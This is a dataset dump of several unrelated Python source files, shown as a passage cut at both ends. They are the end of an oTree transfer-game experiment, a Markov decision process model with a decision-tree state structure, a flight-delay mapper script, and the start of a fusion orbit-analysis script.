player.group.sent_2,\n 'p2_decider': Constants.endowment_Decider - player.group.sent_2,\n 'p2_receiver': Constants.endowment_Receiver + player.group.sent_3,\n 'p3_decider': Constants.endowment_Decider - player.group.sent_3,\n 'p3_receiver': Constants.endowment_Receiver + player.group.sent_4,\n 'p4_decider': Constants.endowment_Decider - player.group.sent_4,\n 'p4_receiver': Constants.endowment_Receiver + player.group.sent_5,\n 'p5_decider': Constants.endowment_Decider - player.group.sent_5,\n }\n\n\nclass P5(Page):\n \"\"\"This page is only for P7\"\"\"\n\n form_model = 'group'\n form_fields = ['sent_5', 'expect_5']\n\n @staticmethod\n def is_displayed(player: Player):\n return player.rol == 'P5'\n\n @staticmethod\n def vars_for_template(player: Player):\n return {\n 'round_number': '{}'.format(player.round_number),\n 'prompt': '0 ile {} arasında bir sayı giriniz.'.format(Constants.endowment_Decider - 2),\n 'p1_receiver': Constants.endowment_Receiver + player.group.sent_2,\n 'p2_decider': Constants.endowment_Decider - player.group.sent_2,\n 'p2_receiver': Constants.endowment_Receiver + player.group.sent_3,\n 'p3_decider': Constants.endowment_Decider - player.group.sent_3,\n 'p3_receiver': Constants.endowment_Receiver + player.group.sent_4,\n 'p4_decider': Constants.endowment_Decider - player.group.sent_4,\n }\n\n\nclass P4(Page):\n \"\"\"This page is only for P4\"\"\"\n\n form_model = 'group'\n form_fields = ['sent_4', 'expect_4']\n\n @staticmethod\n def is_displayed(player: Player):\n return player.rol == 'P4'\n\n @staticmethod\n def vars_for_template(player: Player):\n return {\n 'round_number': '{}'.format(player.round_number),\n 'prompt': '0 ile {} arasında bir sayı giriniz.'.format(Constants.endowment_Decider - 2),\n 'p1_receiver': Constants.endowment_Receiver + player.group.sent_2,\n 'p2_decider': Constants.endowment_Decider - player.group.sent_2,\n 'p2_receiver': Constants.endowment_Receiver + player.group.sent_3,\n 'p3_decider': Constants.endowment_Decider - player.group.sent_3,\n }\n\n\nclass P3(Page):\n \"\"\"This page is only for P3\"\"\"\n\n form_model = 'group'\n form_fields = ['sent_3', 'expect_3']\n\n @staticmethod\n def is_displayed(player: Player):\n return player.rol == 'P3'\n\n @staticmethod\n def vars_for_template(player: Player):\n return {\n 'round_number': '{}'.format(player.round_number),\n 'prompt': '0 ile {} arasında bir sayı giriniz.'.format(Constants.endowment_Decider - 2),\n 'p1_receiver': Constants.endowment_Receiver + player.group.sent_2,\n 'p2_decider': Constants.endowment_Decider - player.group.sent_2,\n }\n\n\nclass P2(Page):\n \"\"\"This page is only for P2\"\"\"\n\n form_model = 'group'\n form_fields = ['sent_2', 'expect_2']\n\n @staticmethod\n def is_displayed(player: Player):\n return player.rol == 'P2'\n\n @staticmethod\n def vars_for_template(player: Player):\n return {\n 'round_number': '{}'.format(player.round_number),\n 'prompt': '0 ile {} arasında bir sayı giriniz.'.format(Constants.endowment_Decider - 2),\n }\n\n\nclass P1(Page):\n \"\"\"This page is only for P1\"\"\"\n\n @staticmethod\n def vars_for_template(player: Player):\n return {'round_number': '{}'.format(player.round_number)}\n\n @staticmethod\n def is_displayed(player: Player):\n return player.rol == 'P1'\n\n\nclass ResultsWaitPage(WaitPage):\n @staticmethod\n def after_all_players_arrive(group: Group):\n set_payoffs(group)\n\n\nclass Results(Page):\n \"\"\"This page displays the earnings of each player\"\"\"\n\n @staticmethod\n def vars_for_template(player: Player):\n p2_transfer = player.group.sent_2\n p3_transfer = player.group.sent_3\n p4_transfer = player.group.sent_4\n p5_transfer = player.group.sent_5\n p6_transfer = player.group.sent_6\n p7_transfer = player.group.sent_7\n p8_transfer = player.group.sent_8\n average_transfer = (\n player.group.sent_2\n + player.group.sent_3\n + player.group.sent_4\n + player.group.sent_5\n + player.group.sent_6\n + player.group.sent_7\n + player.group.sent_8\n ) / 7\n p1_receiver = Constants.endowment_Receiver + player.group.sent_2\n p2_decider = Constants.endowment_Decider - player.group.sent_2\n p2_receiver = Constants.endowment_Receiver + player.group.sent_3\n p3_decider = Constants.endowment_Decider - player.group.sent_3\n p3_receiver = Constants.endowment_Receiver + player.group.sent_4\n p4_decider = Constants.endowment_Decider - player.group.sent_4\n p4_receiver = Constants.endowment_Receiver + player.group.sent_5\n p5_decider = Constants.endowment_Decider - player.group.sent_5\n p5_receiver = Constants.endowment_Receiver + player.group.sent_6\n p6_decider = Constants.endowment_Decider - player.group.sent_6\n p6_receiver = Constants.endowment_Receiver + player.group.sent_7\n p7_decider = Constants.endowment_Decider - player.group.sent_7\n p7_receiver = Constants.endowment_Receiver + player.group.sent_8\n p8_decider = Constants.endowment_Decider - player.group.sent_8\n p8_receiver = (\n Constants.endowment_Receiver\n + (\n player.group.sent_2\n + player.group.sent_3\n + player.group.sent_4\n + player.group.sent_5\n + player.group.sent_6\n + player.group.sent_7\n + player.group.sent_8\n )\n / 7\n )\n p1_payoff = 2 * p1_receiver\n p2_payoff = p2_decider * p2_receiver\n p3_payoff = p3_decider * p3_receiver\n p4_payoff = p4_decider * p4_receiver\n p5_payoff = p5_decider * p5_receiver\n p6_payoff = p6_decider * p6_receiver\n p7_payoff = p7_decider * p7_receiver\n p8_payoff = (\n p8_decider\n * (\n p1_receiver\n + p2_receiver\n + p3_receiver\n + p4_receiver\n + p5_receiver\n + p6_receiver\n + p7_receiver\n )\n / 7\n )\n return {\n 'p2_transfer': p2_transfer,\n 'p3_transfer': p3_transfer,\n 'p4_transfer': p4_transfer,\n 'p5_transfer': p5_transfer,\n 'p6_transfer': p6_transfer,\n 'p7_transfer': p7_transfer,\n 'p8_transfer': p8_transfer,\n 'average_transfer': average_transfer,\n 'p1_receiver': p1_receiver,\n 'p2_decider': p2_decider,\n 'p2_receiver': p2_receiver,\n 'p3_decider': p3_decider,\n 'p3_receiver': p3_receiver,\n 'p4_decider': p4_decider,\n 'p4_receiver': p4_receiver,\n 'p5_decider': p5_decider,\n 'p5_receiver': p5_receiver,\n 'p6_decider': p6_decider,\n 'p6_receiver': p6_receiver,\n 'p7_decider': p7_decider,\n 'p7_receiver': p7_receiver,\n 'p8_decider': p8_decider,\n 'p8_receiver': p8_receiver,\n 'p1_payoff': p1_payoff,\n 'p2_payoff': p2_payoff,\n 'p3_payoff': p3_payoff,\n 'p4_payoff': p4_payoff,\n 'p5_payoff': p5_payoff,\n 'p6_payoff': p6_payoff,\n 'p7_payoff': p7_payoff,\n 'p8_payoff': p8_payoff,\n }\n\n\nclass OverallResults(Page):\n \"\"\"This page displays the earnings of each player\"\"\"\n\n @staticmethod\n def is_displayed(player: Player):\n return player.round_number == Constants.num_rounds\n\n @staticmethod\n def vars_for_template(player: Player):\n cumulative_payoff = sum([p.payoff for p in player.in_all_rounds()])\n return {'overall_earnings': cumulative_payoff}\n\n\nclass Survey(SurveyPage):\n \"\"\"This page displays the questionnaire for each player\"\"\"\n\n def is_displayed(self):\n return self.round_number == Constants.num_rounds\n\n form_model = 'player'\n form_fields = [\n 'dep',\n 'edu',\n 'age',\n 'gen',\n 'inc',\n 'h_inc',\n 'investment_options_1',\n 'investment_options_2',\n 'investment_options_3',\n 'investment_options_4',\n 'investment_options_5',\n 'investment_options_6',\n 'investment_options_7',\n 'investment_options_8',\n 'investment_options_9',\n 'investment_options_10',\n 'env_cons_2',\n 'env_cons_3',\n 'env_cons_5',\n 'env_cons_6',\n 'env_cons_7',\n 'env_cons_9',\n 'fate',\n 'believe',\n 'gpa',\n ]\n\n\npage_sequence = [\n instructions,\n Introduction,\n P1,\n SendBackWaitPage,\n P2,\n SendBackWaitPage,\n P3,\n SendBackWaitPage,\n P4,\n SendBackWaitPage,\n P5,\n SendBackWaitPage,\n P6,\n SendBackWaitPage,\n P7,\n SendBackWaitPage,\n P8,\n ResultsWaitPage,\n Results,\n Survey,\n OverallResults,\n]\n","sub_path":"TPEGcont/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":26365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"74474516","text":"import logging.config\nimport math\nimport warnings\nfrom pprint import pprint\nfrom timeit import default_timer as timer\n\nfrom django.conf import settings\nfrom numpy import mean\nfrom scipy import stats\n\nfrom markovdp.constants import *\nfrom markovdp.exceptions import ConfigurationError, InternalError, StateNotSetError, ParameterError\nfrom markovdp.decision_tree import LeafNode\n\nlogging.config.dictConfig(settings.LOGGING)\nlogger = logging.getLogger(__name__)\n\n\nclass MDPDTModel:\n \"\"\"MDPDTModel Class.\n\n Class that represents a Markov Decision Process model with a decision tree state structure.\n\n \"\"\"\n\n def __init__(self, conf):\n required_fields = [INITIAL_PARAMETERS, PARAMETERS, ACTIONS, DISCOUNT,\n INITIAL_Q_VALUES, SPLIT_ERROR, MIN_MEASUREMENTS]\n\n for f in required_fields:\n if f not in conf:\n raise ConfigurationError(\"%s not provided in the configuration\" % f, logger)\n\n self._discount = conf[DISCOUNT]\n self._parameters = list(conf[PARAMETERS])\n self._min_measurements = max(conf[MIN_MEASUREMENTS], 1)\n self._split_error = conf[SPLIT_ERROR]\n self._actions = conf[ACTIONS]\n self._initial_q_values = conf[INITIAL_Q_VALUES]\n self._initial_params = self._get_params(conf[INITIAL_PARAMETERS])\n self._current_state = None\n self._current_measurements = None\n self._new_states = []\n self._transition_data = []\n self._statistical_test = STUDENT_TTEST\n\n # initiate the decision tree\n self._root = LeafNode(self, self, self._actions, self._initial_q_values, 0, 1)\n self._states = [self._root]\n self._priorities = [0]\n for name, values in self._initial_params.items():\n self._root.split(name, values)\n\n # set the default update and splitting algorithms and initialize the split counters\n self._update_algorithm = SINGLE_UPDATE\n self._update_error = 0.1 # default value for value iteration and PS error\n self._max_updates = 100 # default value for prioritized sweeping updates\n self._split_criterion = MID_POINT\n self._considered_transitions = True\n self._allow_splitting = True\n self._splits = {}\n for p in self._parameters:\n self._splits[p] = 0\n\n logger.debug('Initialized MDPDT model with {} states'.format(len(self._states)))\n\n @property\n def allow_splitting(self):\n \"\"\"Allow or prevent the decision tree from splitting its nodes.\"\"\"\n return self._allow_splitting\n\n @allow_splitting.setter\n def allow_splitting(self, allow=True):\n self._allow_splitting = allow\n logger.debug(\"Allow splitting set to {}\".format(allow))\n\n @property\n def discount(self):\n \"\"\"Returns discount of reward.\"\"\"\n return self._discount\n\n @property\n def splits(self):\n \"\"\"Returns the number of splits that happened for each parameter.\"\"\"\n return self._splits\n\n @property\n def statistical_test(self):\n \"\"\"Set the statistical test to use for splitting.\"\"\"\n return self._statistical_test\n\n @statistical_test.setter\n def statistical_test(self, stat_test):\n self._statistical_test = stat_test\n\n def set_update_algorithm(self, update_algorithm, update_error=0.1, max_updates=10):\n self._update_algorithm = update_algorithm\n self._update_error = update_error\n self._max_updates = max_updates\n logger.debug('Algorithm for updates set to {} with error = {} and max updates = {}'\n .format(update_algorithm, update_error, max_updates))\n\n def set_splitting_criterion(self, split_criterion, consider_transitions=True):\n \"\"\"Set the splitting criterion\"\"\"\n if split_criterion not in SPLIT_CRITERIA:\n raise ParameterError(\"Unknown splitting algorithm: \" + split_criterion, logger)\n self._split_criterion = split_criterion\n self._considered_transitions = consider_transitions\n logger.debug(\"Splitting criterion set to {}, consider transitions set to {}\"\n .format(split_criterion, consider_transitions))\n\n def reset_decision_tree(self, vi_error=None):\n \"\"\"Returns the decision tree to its initial state, preserving all measurements collected.\"\"\"\n # collect the transition information from all the states\n self._transition_data = [t for s in self._states for ts in s.transition_data for t in ts]\n\n # recreate the decision tree\n self._root = LeafNode(self, self, self._actions, self._initial_q_values, 0, 1)\n self._states = [self._root]\n for name, param in self._initial_params.items():\n self._root.split(name, param)\n\n # store the transition data in the new states and recalculate the state values\n self.retrain()\n self.value_iteration(error=vi_error)\n\n # reset the split counters\n for param in self._parameters:\n self._splits[param] = 0\n\n logger.debug(\"Decision Tree has been reset\")\n\n @staticmethod\n def _get_params(parameters):\n \"\"\"Extract the defined limits or values for the initial parameters so that they can be used by a decision node.\n \"\"\"\n new_params = {}\n for name, value in parameters.items():\n\n # for discrete values we define the midpoint as the margin\n if VALUES in value:\n if not isinstance(value[VALUES], list):\n raise ConfigurationError(\"Provided values for %s must be in a list\" % name, logger)\n if len(value[VALUES]) <= 1:\n raise ConfigurationError(\"At least two values must be provided for \" + name, logger)\n\n limits = []\n for i in range(len(value[VALUES]) - 1):\n limits.append((value[VALUES][i] + value[VALUES][i + 1]) / 2)\n new_params[name] = limits\n\n # for continuous values we just ignore the outer margins\n elif LIMITS in value:\n if not isinstance(value[LIMITS], list):\n raise ConfigurationError(\"Provided limits for %s must be in a list\" % name, logger)\n if len(value[LIMITS]) <= 2:\n raise ConfigurationError(\"At least three limits must be provided for \" + name, logger)\n\n new_params[name] = value[LIMITS][1:-1]\n\n else:\n raise ConfigurationError(\"Values or limits must be provided for parameter \" + name, logger)\n\n return new_params\n\n def replace_node(self, old_node, new_node):\n \"\"\"Replaces the root node with the given decision node upon root node splitting.\n\n Args:\n old_node (DecisionNode): The old node under replacement\n new_node (DecisionNode): The new node replacing the old\n\n \"\"\"\n if not self._root.is_leaf():\n raise InternalError(\"Tried to replace the root node but it was not a leaf node\", logger)\n\n if old_node.state_num is not self._root.state_num:\n raise InternalError(\"Tried to replace the root node with a different initial node\", logger)\n\n self._root = new_node\n\n def set_state(self, measurements):\n \"\"\"Sets the current state based on the given measurements.\n\n Args:\n measurements (dict): A dictionary of measurements\n\n \"\"\"\n self._current_measurements = measurements\n self._current_state = self._root.get_state(measurements)\n\n def remove_state(self, state_num):\n \"\"\"Removes the state with the given state_num from the model\n\n Args:\n state_num (int): The number of the state under removal\n\n \"\"\"\n self._root.remove_state(state_num)\n self._states[state_num] = None\n self._priorities[state_num] = 0\n\n def store_transition_data(self, data):\n \"\"\"Stores the given transition data to be used later on for retraining.\n\n Args:\n data (list): A list of transition data\n\n \"\"\"\n self._transition_data += data\n\n def add_states(self, states):\n \"\"\"Adds new states to the model. The first will go in the empty spot and the rest at the end.\n\n Args:\n states (list(State)): A list of states to add to the model\n\n \"\"\"\n # the first state will not be appended at the end\n self._root.extend_states(len(states) - 1)\n self._priorities += [0] * (len(states) - 1)\n self._new_states = states\n\n # place the first state in the empty spot and the rest at the end\n replaced_state_num = states[0].state_num\n if not self._states[replaced_state_num] is None:\n raise InternalError(\"Replaced state was not None\")\n\n self._states[replaced_state_num] = states[0]\n self._states += states[1:]\n\n def suggest_action(self):\n \"\"\"Suggest the optimal action to take from the current state.\n\n Returns:\n action (tuple): The optimal action from the current state\n\n \"\"\"\n if self._current_state is None:\n raise StateNotSetError(logger)\n\n return self._current_state.get_optimal_action()\n\n def get_legal_actions(self):\n \"\"\"Returns all the legal actions from the current_state.\"\"\"\n if self._current_state is None:\n raise StateNotSetError(logger)\n\n return self._current_state.get_legal_actions()\n\n def update(self, action, measurements, reward):\n \"\"\"Updates model after taking given action and ending up in the state corresponding to the measurements.\n\n Args:\n action (tuple): The recent taken action\n measurements (dict): The measurements collected after the action\n reward (double): The reward acquired through the specific action\n\n \"\"\"\n if self._current_measurements is None:\n raise StateNotSetError(logger)\n\n # TODO move this where the splitting is decided\n self._current_state = self._root.get_state(self._current_measurements)\n\n # determine the new state\n new_state = self._root.get_state(measurements)\n new_num = new_state.state_num\n\n # store the transition information\n trans_data = (self._current_measurements, measurements, action, reward)\n self._current_state.store_transition(trans_data, new_num)\n\n # update the qstate\n q_state = self._current_state.get_q_state(action)\n q_state.update(new_state, reward)\n\n # update the model values according to the chosen algorithm\n if self._update_algorithm == SINGLE_UPDATE:\n self._q_update(q_state)\n self._current_state.update_value()\n elif self._update_algorithm == VALUE_ITERATION:\n self.value_iteration()\n elif self._update_algorithm == PRIORITIZED_SWEEPING:\n self.prioritized_sweeping()\n\n # consider splitting the initial_state\n if self._allow_splitting:\n self.split()\n\n # update the current state and store the last measurements\n self._current_state = new_state\n self._current_measurements = measurements\n\n def retrain(self):\n \"\"\"Retrains the model with the transition data temporarily stored in the model.\"\"\"\n for m1, m2, a, r in self._transition_data:\n # Determine the states involved in the transition\n old_state = self._root.get_state(m1)\n new_state = self._root.get_state(m2)\n\n # Store the transition data in the initial state of the transition\n new_num = new_state.state_num\n old_state.store_transition((m1, m2, a, r), new_num)\n\n # Update the qstate\n q_state = old_state.get_q_state(a)\n q_state.update(new_state, r)\n\n # clear the transition data from the model\n self._transition_data = []\n\n def chain_split(self):\n \"\"\"Repeatedly attempts to split all the nodes until no splits are possible.\"\"\"\n num_splits, did_split = 0, True\n while did_split:\n did_split = False\n states = list(self._states)\n for state in states:\n if self.split(state=state):\n did_split = True\n num_splits += 1\n\n if did_split:\n self.value_iteration()\n\n logger.debug(\"Chain splitting complete after {} splits\".format(num_splits))\n\n def _q_update(self, q_state):\n \"\"\"Runs a single update for the Q-value of the given state-action pair.\"\"\"\n new_q_value = 0\n for i in range(len(self._states)):\n t = q_state.get_transition(i)\n r = q_state.get_reward(i)\n new_q_value += t * (r + self._discount * self._states[i].value)\n\n q_state.q_value = new_q_value\n\n def _v_update(self, state):\n \"\"\"Recalculates values of all Q-states of the given state, updates the value of the state accordingly.\"\"\"\n for q_state in state.q_states:\n self._q_update(q_state)\n\n state.update_value()\n\n def value_iteration(self, error=None):\n \"\"\"Runs the value iteration algorithm on the model.\"\"\"\n if error is None:\n error = self._update_error\n\n start = timer()\n repeat = True\n while repeat:\n repeat = False\n for state in self._states:\n old_value = state.value\n self._v_update(state)\n new_value = state.value\n if abs(old_value - new_value) > error:\n repeat = True\n end = timer()\n\n logger.debug(\"Value iteration complete after {} seconds\".format(end - start))\n\n def prioritized_sweeping(self, initial_state=None, error=None, max_updates=None, debug=False):\n \"\"\"Runs prioritized sweeping starting from the given state.\"\"\"\n if self._current_state is None and initial_state is None:\n raise StateNotSetError(logger)\n\n if initial_state is None:\n initial_state = self._current_state\n if error is None:\n error = self._update_error\n if max_updates is None:\n max_updates = self._max_updates\n\n # transition probabilities have changed for the initial state\n reverse_transitions = [{} for _ in self._states]\n for state in self._states:\n for state_num, t in state.get_max_transitions().items():\n reverse_transitions[state_num][state.state_num] = t\n\n state = initial_state\n for i in range(max_updates):\n\n # update the state value\n old_value = state.get_value()\n self._v_update(state)\n new_value = state.get_value()\n delta = abs(new_value - old_value)\n\n # update the priorities of the predecessors\n rev_transitions = reverse_transitions[state.state_num]\n for state_num, t in rev_transitions.items():\n self._priorities[state_num] = max(t * delta, self._priorities[state_num])\n\n # zero the updated state's priority\n self._priorities[state.state_num] = 0\n\n # Choose the next max priority state\n # TODO with Priority Queue - but needs to support item removal\n max_index, max_priority = 0, 0\n for j in range(len(self._priorities)):\n if self._priorities[j] > max_priority:\n max_priority = self._priorities[j]\n max_index = j\n\n # stop if the priority gets below the supplied limit\n if max_priority <= error:\n break\n\n state = self._states[max_index]\n\n def stat_test(self, x1, x2):\n stat = None\n if self._statistical_test == STUDENT_TTEST:\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n _, stat = stats.ttest_ind(x1, x2)\n elif self._statistical_test == WELCH_TTEST:\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n _, stat = stats.ttest_ind(x1, x2, equal_var=False)\n elif self._statistical_test == MANN_WHITNEY_UTEST:\n try:\n _, stat_one_sided = stats.mannwhitneyu(x1, x2)\n stat = 2 * stat_one_sided\n except ValueError:\n stat = 1\n elif self._statistical_test == KOLMOGOROV_SMIRNOV:\n _, stat = stats.ks_2samp(x1, x2)\n return stat\n\n def split(self, state=None):\n # Initialize timer\n start = timer()\n\n # Check if state exists\n if state is None:\n state = self._current_state\n\n # Collect the transitions that occurred after taking the optimal action\n optimal_action = state.get_optimal_action()\n transitions = [t for ts in state.transition_data for t in ts if t[2] == optimal_action]\n\n if self._split_criterion == MID_POINT and len(transitions) == 0:\n return False\n\n # Mid point splitting\n incr_measurements, decr_measurements = [], []\n best_incr_par, best_decr_par = 0, 0\n # Other point splitting types\n q_values = []\n\n if self._considered_transitions:\n # Partition the transitions to those that would increase or decrease the q-value\n if self._split_criterion == MID_POINT:\n for m1, m2, a, r in transitions:\n new_state_value = self._root.get_state(m2).value\n q_value = r + self._discount * new_state_value\n if q_value >= state.value:\n incr_measurements.append(m1)\n else:\n decr_measurements.append(m1)\n else:\n for m1, m2, a, r in transitions:\n new_state_value = self._root.get_state(m2).get_value()\n q_value = r + self._discount * new_state_value\n q_values.append((m1, q_value))\n else:\n # Partition the transitions to those that gave higher or lower rewards than average\n if self._split_criterion == MID_POINT:\n average_rewards = mean([t[3] for t in transitions])\n for m1, m2, a, r in transitions:\n if r >= average_rewards:\n incr_measurements.append(m1)\n else:\n decr_measurements.append(m1)\n else:\n for m1, m2, a, r in transitions:\n q_values.append((m1, r))\n\n if min(len(incr_measurements), len(decr_measurements)) < self._min_measurements \\\n and self._split_criterion == MID_POINT:\n return False\n\n if self._split_criterion == INFO_GAIN:\n # Calculate the information required for the current state\n state_value = state.get_value()\n high_q = sum(1 for q in q_values if q[1] > state_value)\n low_q = len(q_values) - high_q\n state_info = self._info(high_q, low_q)\n\n # Find the splitting point with the lowest null hypothesis probability\n best_par, best_point = None, None\n lowest_error = 1\n # Max point splitting\n max_diff = 0\n # Info Gain Splitting\n min_info = float('inf')\n\n if self._split_criterion == MID_POINT:\n for par in self._parameters:\n incr_par = [m[par] for m in incr_measurements]\n decr_par = [m[par] for m in decr_measurements]\n t1_error = self.stat_test(incr_par, decr_par)\n\n if t1_error < lowest_error:\n lowest_error = t1_error\n best_par = par\n best_incr_par = incr_par\n best_decr_par = decr_par\n else:\n for par in self._parameters:\n par_values = sorted([(q[0][par], q[1]) for q in q_values])\n # Only consider points that leave at least min_measurements points on either side\n for i in range(self._min_measurements, len(transitions) - self._min_measurements + 1):\n # Only split between distinct measurements\n if par_values[i][0] == par_values[i - 1][0]:\n continue\n\n low_values = [p[1] for p in par_values[:i]]\n high_values = [p[1] for p in par_values[i:]]\n\n if self._split_criterion == INFO_GAIN:\n low_incr = sum(1 for q in low_values if q > state_value)\n high_incr = sum(1 for q in high_values if q > state_value)\n low_decr = len(low_values) - low_incr\n high_decr = len(high_values) - high_incr\n info = self._expected_info(low_incr, low_decr, high_incr, high_decr)\n\n if info < min_info:\n min_info = info\n best_par = par\n best_point = 0.5 * (par_values[i][0] + par_values[i - 1][0])\n\n continue\n\n t1_error = self.stat_test(low_values, high_values)\n\n if self._split_criterion == MAX_POINT:\n if t1_error > self._split_error:\n continue\n low_avg = mean(low_values)\n high_avg = mean(high_values)\n if abs(high_avg - low_avg) > max_diff:\n max_diff = abs(high_avg - low_avg)\n best_par = par\n best_point = (par_values[i][0] + par_values[i - 1][0]) / 2\n else:\n if t1_error < lowest_error:\n lowest_error, best_par = t1_error, par\n best_point = (par_values[i][0] + par_values[i - 1][0]) / 2\n\n if self._split_criterion in [MID_POINT, ANY_POINT]:\n if best_par is None or lowest_error > self._split_error:\n return False\n elif self._split_criterion == MAX_POINT:\n if best_par is None:\n return False\n else:\n if best_par is None or min_info > state_info:\n return False\n\n if self._split_criterion == MID_POINT:\n incr_mean = mean(best_incr_par)\n decr_mean = mean(best_decr_par)\n best_point = (incr_mean + decr_mean) / 2\n\n # Perform a split at the selected point\n state.split(best_par, [best_point])\n self._splits[best_par] += 1\n\n # Recalculate the values of the new states generated by the split\n for state in self._new_states:\n self._v_update(state)\n self._new_states = []\n\n end = timer()\n\n logger.debug(\"Split with {} at {} with {} {} after {} seconds\"\n .format(best_par, best_point, self._split_criterion, max_diff, end - start))\n return True\n\n def _expected_info(self, p1, n1, p2, n2):\n \"\"\"Returns the expected information required as per Quinlan's ID3.\"\"\"\n s = p1 + n1 + p2 + n2\n s1 = p1 + n1\n s2 = p2 + n2\n\n return (s1 / s) * self._info(p1, n1) + (s2 / s) * self._info(p2, n2)\n\n @staticmethod\n def _info(p, n):\n \"\"\"Returns the expected classification information as per Quinlan's ID3.\"\"\"\n if n <= 0 or p <= 0:\n return 0\n else:\n return -(p / (p + n)) * math.log(p / (p + n), 2) - (n / (p + n)) * math.log(n / (p + n), 2)\n\n def get_percent_not_taken(self):\n \"\"\"Returns the percentage of actions that have never been taken.\"\"\"\n total = 0\n not_taken = 0\n for state in self._states:\n for q_state in state.q_states:\n total += 1\n if q_state.get_num_taken() == 0:\n not_taken += 1\n\n return not_taken / total\n\n def print_transition_data(self):\n \"\"\"Prints all the stored transition data for all the states in the model.\"\"\"\n if self._transition_data:\n print(\"Temporary data in the model:\")\n pprint(self._transition_data)\n\n for state in self._states:\n print(\"State %d:\" % state.state_num)\n pprint(state.transition_data)\n\n def print_model(self, detailed=False):\n \"\"\"Prints the states of the model. If detailed is True it also prints the Q-states.\"\"\"\n for state in self._states:\n if detailed:\n state.print_detailed()\n print(\"\")\n else:\n print(state)\n\n def print_state_details(self):\n \"\"\"Prints the Q-states and the transition and reward lists for each Q-state.\"\"\"\n for state in self._states:\n print(\"Node %d:\" % state.state_num)\n for q_state in state.q_states:\n print(q_state)\n # print(\"Transitions:\", qs.transitions)\n # print(\"Rewards: \", qs.rewards)\n print(\"\")\n","sub_path":"markovdp/mdp_dt_model.py","file_name":"mdp_dt_model.py","file_ext":"py","file_size_in_byte":25083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"621775681","text":"#!/usr/bin/env python3\n\nimport sys\n\n# input comes from STDIN (standard input)\nfor line in sys.stdin:\n carrierDelay = \"\"\n weatherDelay = \"\"\n NASDelay = \"\"\n securityDelay = \"\"\n lateAircraftDelay = \"\"\n curIndex = 0\n # remove leading and trailing whitespace\n line = line.strip()\n # split the line into words\n words = line.split(\",\")\n # increase counters\n for word in words:\n if curIndex == 58: carrierDelay = word\n if curIndex == 59: weatherDelay = word\n if curIndex == 60: NASDelay = word\n if curIndex == 61: securityDelay = word\n if curIndex == 62: lateAircraftDelay = word\n curIndex = curIndex + 1\n #print(airline)\n #print(depDel15)\n #print(arrDel15)\n # write the results to STDOUT (standard output);\n # what we output here will be the input for the\n # Reduce step, i.e. the input for reducer.py\n #\n # tab-delimited; the trivial word count is 1\n if carrierDelay != \"1.00\" and carrierDelay != \"\":\n print(\"{0}\\t1\".format(\"Carrier delay\"))\n if weatherDelay != \"1.00\" and weatherDelay != \"\":\n print(\"{0}\\t1\".format(\"Weather delay\"))\n if NASDelay != \"1.00\" and NASDelay != \"\":\n print(\"{0}\\t1\".format(\"NAS delay\"))\n if securityDelay != \"1.00\" and securityDelay != \"\":\n print(\"{0}\\t1\".format(\"Security delay\"))\n if lateAircraftDelay != \"1.00\" and lateAircraftDelay != \"\":\n print(\"{0}\\t1\".format(\"Late aircraft\"))\n","sub_path":"reasonMapper.py","file_name":"reasonMapper.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"175452534","text":"# Make a file with orbit intersections\n#\n# calculate the mean mid-plane intersection radiuii for ensemble calculation\n#\n# uses 5 digit track numbering and assumes the standard format from ensemle calculations\n# \n# this version is for orbit3 output\n\nimport fileinput as FI\nimport numpy as np\nimport LT.box as B\nimport os.path as P\nimport os\nimport database_operations as db\nimport glob as G\n#import sys\n#from LT.parameterfile import pfile\n\n\n# special version for orbit data\n\nimport orbit_view_data_fast as vd\n# import orbit_view_data as vd\n# parse arguments\nimport argparse as AG\n\n\nparser = AG.ArgumentParser()\n#parser.add_argument(\"control_file\", nargs = '?', help=\"Control file \", default = 'control_get_radii.data')\nparser.add_argument(\"Shot\", nargs = '?', help=\"Control file \", default = 29975)\nargs = parser.parse_args()\nshot=args.Shot\n#----------------------------------------------------------------------\n# find the first mid-plane crossing of trajectory v\ndef get_zero_crossing(v):\n i_n = np.where(v.zt<=0.)[0][0]\n i_p = i_n - 1\n zp = v.zt[i_p]\n rp = v.rt[i_p]\n zn = v.zt[i_n]\n rn = v.rt[i_n]\n m = (zp -zn)/(rp - rn)\n r0 = rn - zn/m\n return r0\n \ndef get_names_ch(s):\n vf = s.replace(' ','').split(',')\n name = []\n chan = []\n for v in vf:\n fields = v.split('/')\n v_name = fields[0]\n ch = np.array(fields[1:]).astype(int)\n name.append(v_name)\n chan.append(ch)\n return name, chan\n\ndef get_magnetic_axis(of):\n z_ok = False\n r_ok = False\n for line in FI.input(of):\n if line.find('rmaxis')>=0:\n rmaxis = float(line.split('=')[1])\n r_ok = True\n if line.find('zmaxis')>=0:\n zmaxis = float(line.split('=')[1])\n z_ok = True\n if (r_ok & z_ok):\n FI.close()\n break\n return rmaxis, zmaxis \n\n\n# get parameters from file\n\n\n#cd = pfile(args.control_file)\n\ndef get_times(view_names):\n times = []\n for vn in view_names:\n f = vn.split('_')\n t = []\n for ff in f:\n try:\n x = float(ff)\n except:\n continue\n t.append(x)\n times.append(t[-1])\n return times\n \n\n# define the emissivity model\n#----------------------------------------------------------------------\nview_files = []\nmag_axis = []\n\ndet_exp = []\nch_exp = []\nR_exp = []\ndR_exp = []\n\nR_exp_n = []\ndR_exp_n = []\n# get data\n\n\n(view_dir,)= db.retrieve('view_dir', 'Combined_Rates', 'Shot = '+str(shot))\n#view_dir = cd.get_value('view_dir')\n(view_name,) = db.retrieve('view_names', 'Combined_Rates', 'Shot = '+str(shot))\n#view_names, v_chan = get_names_ch( cd.get_value('views') )\n(channels_str,) = db.retrieve('Channels', 'Combined_Rates', 'Shot = '+str(shot))\nv_chan_f = list(map(int, channels_str.split(',')))\nv_chan=[[0,1,2,3,4,5]]\nview_names=[]\nview_names.append(view_name)\n#v_chan.append(v_chan_f)\nv_chan_f = np.array(v_chan).flatten()\n#print view_names\n#print v_chan_f\n#print v_chan\n#try:\n# res_dir = cd.get_value('results_dir')\n#except:\nres_dir = './Analysis_Results/'+str(shot)+'/emissivity_model_results/'\n\n(r_min,r_max)= db.retrieve('r_min, r_max', 